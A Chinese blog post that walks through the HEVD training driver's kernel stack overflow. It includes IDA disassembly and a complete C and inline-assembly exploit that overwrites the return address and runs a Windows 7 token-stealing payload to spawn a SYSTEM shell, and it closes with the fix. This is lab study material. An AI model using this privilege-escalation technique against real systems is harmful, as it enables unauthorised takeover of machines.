初探栈溢出

最新推荐文章于 2023-03-24 00:09:02 发布
最新推荐文章于 2023-03-24 00:09:02 发布
阅读量886 收藏
点赞数
文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hongduilanjun/article/details/126850693
版权

0x01 HEVD介绍

HEVD全称为HackSys Ex

treme Vulnerable Drive,是一个项目,故意设计包含多种漏洞的驱动程序,旨在帮助安全爱好者来提升他们在内核层面的漏洞利用能力。

说白了,是一个内核漏洞的靶场。

项目地址:https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

关于安装配置初始环境,建议参考:

https://tttang.com/archive/1332/

https://bbs.pediy.com/thread-218838.htm

这里就不再赘述。

本人能力有限,刚学习过一些内核知识,文章中出现的任何错误欢迎师傅们批评指正。

下面我们直接开始,从栈溢出开始

0x02 栈溢出函数定位

HackSysExtremeVulnerableDriver-3.00\Driver\HEVD\BufferOverflowStack.c文件中。

位于该文件的107行,没有经过校验Size的大小而直接使用函数进行拷贝。

相关漏洞函数为:TriggerBufferOverflowStack

将HEVD.sys文件拖入ida中分析。定位到TriggerBufferOverflowStack函数

可以看到使用了memcpykernelBuffer有拷贝动作,将UserBuffer的值拷贝到kernelBuffer中,拷贝长度为传入的参数Size。

问题在于kernelBuffer的长度是固定的:

一个ULONG类型对应四个字节,那么512*4=2048=800h,这和IDA逆向出来的代码是相同的:

而UserBuffer和Size为传入的参数,并且对Size的大小没有限制,那么倘若Size大小大于800h字节,则会发生栈溢出。

0x03 溢出函数是怎样被调用的

相关调用链

首先是进入到DriverEntry(x,x),然后通过IrpDeviceIoCtlHandler(x,x)根据IoControlCode使用switch函数跳转到BufferOverflowStackIoctlHandler然后进入TriggerBufferOverflowStack进行溢出操作

找到IrpIrpDeviceIoCtlHandler函数

PAGE:00444064 _IrpDeviceIoCtlHandler@8 proc near      ; DATA XREF: DriverEntry(x,x)+87↓o
PAGE:00444064
PAGE:00444064 DeviceObject    = dword ptr  8
PAGE:00444064 Irp             = dword ptr  0Ch
PAGE:00444064
PAGE:00444064                 push    ebp
PAGE:00444065                 mov     ebp, esp
PAGE:00444067                 push    ebx
PAGE:00444068                 push    esi
PAGE:00444069                 push    edi
PAGE:0044406A                 mov     edi, [ebp+Irp]
PAGE:0044406D                 mov     ebx, 0C00000BBh
PAGE:00444072                 mov     eax, [edi+60h]
PAGE:00444075                 test    eax, eax
PAGE:00444077                 jz      loc_4444C5
PAGE:0044407D                 mov     ebx, eax
PAGE:0044407F                 mov     ecx, [ebx+0Ch]
PAGE:00444082                 lea     eax, [ecx-222003h] ; switch 109 cases
PAGE:00444088                 cmp     eax, 6Ch
PAGE:0044408B                 ja      def_444098      ; jumptable 00444098 default case, cases 2236420-2236422,2236424-2236426,2236428-2236430,2236432-2236434,2236436-2236438,2236440-2236442,2236444-2236446,2236448-2236450,2236452-2236454,2236456-2236458,2236460-2236462,2236464-2236466,2236468-2236470,2236472-2236474,2236476-2236478,2236480-2236482,2236484-2236486,2236488-2236490,2236492-2236494,2236496-2236498,2236500-2236502,2236504-2236506,2236508-2236510,2236512-2236514,2236516-2236518,2236520-2236522,2236524-2236526
PAGE:00444091                 movzx   eax, ds:byte_444554[eax]
PAGE:00444098                 jmp     ds:jpt_444098[eax*4] ; switch jump

这里看的不是很清楚,可以通过IDA F5反编译一下

可以看到只有当IoControlCode为2236419时,才会调用BufferOverflowStackIoctlHandler,继而调用TriggerBufferOverflowStack

0x04 漏洞利用

作为脚本小子,先跑一下写好了的exploit脚本。

打开HackSysEVDExploit.sln文件,直接在vs2019上编译即可。

将生成的HackSysEVDExploit.exe拷贝至win7,执行如下命令

HackSysEVDExploit.exe -c cmd.exe -p

直接可以获取system权限。

那么只跑一下脚本肯定不行,一起分析一下他是如何做到的。

首先,栈溢出了,我们最希望控制的就是EIP,通过栈溢出的漏洞将原来函数返回的地址覆盖为我们自己希望执行代码的地址。那么应该弄清楚一点,返回地址在哪?

可以在ida上找到答案,通过stack窗口可以看到TriggerBufferOverflowStack的堆栈图:

我们可以通过kernelBuffer溢出来覆盖r的值,r相对KernelBuffer的偏移为820h。

所以我们可以申请一块0x824大小的空间,然后将我们要执行函数或者shellcode的地址填入0x820的位置,即可覆盖返回地址。

TriggerBufferOverflowStack执行结束后就会执行我们自己的代码。

这里有一个小问题需要注意,执行完我们自己的代码以后我们需要让程序能够继续正常执行,那么需要做平衡堆栈的动作

最终我们自己编写的exp为:

#include "stdio.h"
#include "windows.h"
#include <stdlib.h>
#include <tchar.h>


VOID TokenStealingPayloadWin7() {
    // Importance of Kernel Recovery
    __asm {
        pushad; Save registers state

        ; Start of Token Stealing Stub
        xor eax, eax; Set ZERO
        mov eax, fs: [eax + 124h] ; Get nt!_KPCR.PcrbData.CurrentThread
        ; _KTHREAD is located at FS : [0x124]

        mov eax, [eax + 50h]; Get nt!_KTHREAD.ApcState.Process  //养父母

        mov ecx, eax; Copy current process _EPROCESS structure

        mov edx, 4; WIN 7 SP1 SYSTEM process PID = 0x4

        SearchSystemPID:
        mov eax, [eax + 0b8h]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, 0b8h
            cmp[eax + 0b4h], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

            mov edx, [eax + 0f8h]; Get SYSTEM process nt!_EPROCESS.Token
            mov[ecx + 0f8h], edx; Replace target process nt!_EPROCESS.Token //替换token为system的token
            ; with SYSTEM process nt!_EPROCESS.Token
            ; End of Token Stealing Stub

            popad; Restore registers state

            ; Kernel Recovery Stub
            xor eax, eax; Set NTSTATUS SUCCEESS
            add esp, 12; Fix the stack
            pop ebp; Restore saved EBP
            ret 8; Return cleanly
    }
}

static VOID Cmd()
{
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
    if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}

int main()
{
    char buffer[0x824];
    HANDLE hDevice;
    DWORD bReturn = 0;
    hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL)
    {
        printf("Failed to get handle...!\n");
        return 0;
    }

    memset(buffer, 'A', 0x824);
    *(PDWORD)(buffer + 0x820) = (DWORD)&TokenStealingPayloadWin7;


    DeviceIoControl(hDevice, 2236419, buffer, 0x824, NULL, 0, &bReturn, NULL); //IoControlCode要为2236419才会执行BufferOverflowStackIoctlHandler
    Cmd();
    return 0;
}

payload解读

其中TokenStealingPayloadWin7为payload函数。

在ring3,fs:[0]指向TEB,在ring0,fs:[0]指向KPCR。

然后通过KPCR+124h获取CurrentThread,CurrentThread结构体为EThread,EThread的第一个成员KThread+40为APC_STATE结构,其中包含当前线程的“养父母”进程。

EPROCESS+0xb8指向的是一个链表,串着所有进程的信息,我们可以通过遍历这个链表获取pid为4(EPROCESS+0xb4),system进程的EPROCESS信息。

最后将当前进程的token(EPROCESS+0xf8)的值替换为system进程的token的值,让当前进程权限为system。达到权限提升的作用。

最后需要平衡堆栈,以及将返回后的两句代码添上。

其余代码

memset(buffer, 'A', 0x824);
*(PDWORD)(buffer + 0x820) = (DWORD)&TokenStealingPayloadWin7;

将相对kernelBuffer偏移0x820字节返回位置进行覆盖,改为我们自己函数的地址。

hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
        NULL
    );

创建设备与驱动通信

DeviceIoControl(hDevice, 2236419, buffer, 0x824, NULL, 0, &bReturn, NULL);

IoControlCode要为2236419才会执行BufferOverflowStackIoctlHandler,这一点我们上面也已经分析过了。

static VOID Cmd()
{
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
    if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}

由于当前进程具有system令牌,我们通过当前进程创建的cmd.exe拥有system权限。

最后执行我们自己的exp,成功弹出system权限的cmd。

0x05 修复

Size改为sizeof(KernelBuffer),达到一个限制大小的作用,这一点在SECURE(安全的代码)代码中也有体现。

红队蓝军
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【GCC编译优化系列】究竟什么样的代码会导致函数调用的栈溢出呢?
一个专注于嵌入式IoT领域的架构师,深耕IoT领域多年,深度掌握IoT领域的相关技术栈,包括但不限于RTOS内核的实现及其移植、硬件驱动移植开发、网络通讯协议开发、编译构建原理及其实现、底层汇编及编译原理、编译优化及代码重构、嵌入式IoT系统的架构设计等。
12-07 6649
一段看似铁定栈溢出的函数代码,它一定会溢出吗?
Windows栈溢出学习笔记
不想当脚本小子的脚本小子
02-22 1072
Windows下栈溢出: 1.高级语言编译链接后变成PE文件,PE装载运行后变成进程。 2.系统栈: 操作系统为进程中的每个函数调用都划分了一个栈帧空间,(系统自动分配)系统栈是这些函数调用栈帧的集合; 系统栈由系统自动维护: 1)随着函数调用层数的增加,函数栈帧是一块块地向内存低地址方向延伸的,当前正在运行的函数的栈帧总是在栈顶; 2)随着进程中函数调用层数的减少,即各函数调用的返回,栈...
Windows内核(HEVD) 之栈溢出
qq_41071646的博客
09-05 474
最近一直再看那玩意 甚至比赛都没有时间准备了 接下来的好多线下赛 都有点慌 好久没有接触CTF题目 不过这个太坑了,,,, 我一开始下载后 直接用的就是源代码编译 然后一直有坑, , 搞了两天才意思到 要编译成 Release 唉,,, HEVD的推荐编译环境是 vs2015 我这里是vs2013 也可以到他们github 直接下载 成品 虚拟机的话 是 win7 x8...
使用memcpy缓冲区溢出了
bobopeng
07-26 7826
今天继续编写远控,但是
Windows栈溢出原理
weixin_33766805的博客
03-28 387
1.栈是什么? 栈是一种运算受限的线性表 其限制是仅允许在表的一端进行插入和删除运算 这一端称为栈顶(TOP),相对的另一端称为栈底(BASE) 向一个栈插入新元素,称作进栈、入栈或压栈(PUSH) 它是把新元素放到栈顶元素的上边,使之成为新的栈顶元素; 从一个栈删除元素,又称出栈或退栈(POP) 它是把栈顶元素删除掉,使其相邻的元素成为新的栈顶元素 进程使用的内存可以分成4个部分...
代码溢出初探
12-25
代码溢出是计算机安全领域中的一个重要概念,主要发生在程序处理数据时,由于对输入数据的长度控制不严,导致数据超过了预设的存储空间,从而影响到相邻内存区域的数据,甚至可能改变程序的执行流程。这个例子展示了...
ReactNativeForAndroid初探
02-26
Facebook在React.jsConf2015大会上推出了基于JavaScript的开源框架ReactNative。ReactNative结合了Web应用和Native应用的优势,可以使用JavaScript来开发iOS和Android原生应用。在JavaScript中用React抽象操作系统...
Spark初探
01-30
Spark 基于内存计算,提高了在大数据环境下数据处理的实时性,同时保证了高容错性和高可伸缩性,允许用户将Spark 部署在大量廉价硬件之上,形成集群。ApacheSparkisanopensourcecluster ...—bothfasttorun
MySQLCluster实战初探
07-23
资源名称:MySQL Cluster实战初探 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
duilib初探
08-24
duilib初探
Windows漏洞利用开发系列教程第二部分:栈溢出覆盖返回地址
01-11
翻过国外的一个二进制漏洞学习教程, 非常适合刚学习漏洞的新人。
网络渗透——BSD的memcpy溢出利用技术
06-09
网络渗透——BSD的memcpy溢出利用技术 内部安全资料,欢迎下载......................
内存篇之栈溢出
热门推荐
半山茶馆
12-24 1万+
“溢出”这个词很生动,水满则溢,前面说过栈就象一个容器,容器装满了,还要往里装东西,当然就会溢出了。     有两种不同情景都被称为栈溢出,一种是栈中的数据被越界覆盖,wiki中称这种情况为stack buffer overflow。一种常用的黑客攻击手段--栈溢出攻击,就是通过栈越界访问,用事先设计好的数据覆盖正常栈里的内容。比如把保存函数返回地址的栈内存用某段黑客代码的地址覆盖,函数结束时不
memcpy()造成缓冲区溢出将影响this指针
angel_rabbit的专栏
04-13 2100
void * memcpy(void * dst, void * src, size_t count) 如果count大于src的范围,而且src在高地址(堆中分配),且class A,A也是new出来的,会影响this指针。
memcpy&strcpy溢出现象记录
最新发布
weixin_40932028的博客
03-24 654
内存复制在地址极限使用情况下有可能溢出的问题
一文读懂|栈溢出攻击
嵌入式Linux
11-23 1753
什么是栈简单来说,栈是一种LIFO(Last In Frist Out,后进先出)形式的数据结构。栈一般是从高地址向低地址增长,并且栈支持push(入栈)和pop(出栈)两个操作。如下图所示:push操作先将栈顶(sp指针)向下移动一个位置,然后将数据写入到新的栈顶;而pop操作会从栈顶读取数据,并且将栈顶(sp指针)向上移动一个位置。例如,将 0x100 压入栈,...
缓冲区溢出之strcpy和memcpy
Xor0ne
04-13 3586
问题:不用嵌入式汇编调用和函数调用,仅仅字符串的操作按顺序调用他们。 这个是今天抛出来的一个问题,似乎有着似曾相识的感觉。想到之前老师用strcpy()溢出实现过三个函数的调用,折回去看了一下之前的思路,然后按照题意进行分析。 文章目录方法一:strcpy()函数:易发生\x00截断1、strcpy溢出原理简述2、代码示例及分析3、shellcode的构造4、最终代码方法二:memcpy函数溢出1...
PWN简单堆栈溢出漏洞利用(一)
SkYe's Blog
08-12 2253
gets 函数栈溢出 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn0目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链接的ELF...
memcpy 长度0_缓冲区溢出之Strcpy和Memcpy
weixin_39943202的博客
12-04 732
问题:定义三个函数fu'n1,fun2,fun3,不使用嵌入式汇编调用和函数调用,仅仅字符串的操作按顺序调用他们。这个是今天老师抛出来的一个问题,似乎有着似曾相识的感觉。想到之前老师用strcpy()溢出实现过三个函数的调用,折回去看了一下之前的思路,然后按照题意进行分析。方法一:strcpy()函数:易发生\x00截断strcpy()的文章请查看:Strcpy()函数之缓冲区溢出1、s...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值